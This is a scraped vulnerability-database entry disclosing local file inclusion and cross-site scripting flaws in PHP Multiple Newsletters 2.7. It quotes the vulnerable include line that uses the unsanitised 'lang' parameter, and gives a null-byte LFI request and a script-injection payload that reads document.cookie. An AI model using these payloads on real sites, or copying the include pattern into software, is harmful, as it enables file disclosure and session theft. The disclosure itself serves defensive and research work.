https://cxsecurity.com/issue/WLB-2008120145
PHP Multiple Newsletters 2.7 (LFI/XSS) Multiple Vulnerabilities






漏洞ID | 1052322 | 漏洞类型 | |
发布时间 | 2008-12-18 | 更新时间 | 2008-12-18 |
![]() |
CVE-2008-5566
CVE-2008-5570 |
![]() |
N/A |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
****(Lfi/xss)****
script: PHP_Multiple_Newsletters v2.7
***************************************************************************
download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip
***************************************************************************
vul:/index.php
line 36:
include ('language/'..$_REQUEST['lang'].'.php');
***************************************************
xpl:
www.site.com/path/index.php?lang=[Lfi]%00
xss:
www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
...................................................
Author: ahmadbady from:iran
my mail: kivi_hacker666@yahoo.com
***************************************************
检索漏洞
开始时间
结束时间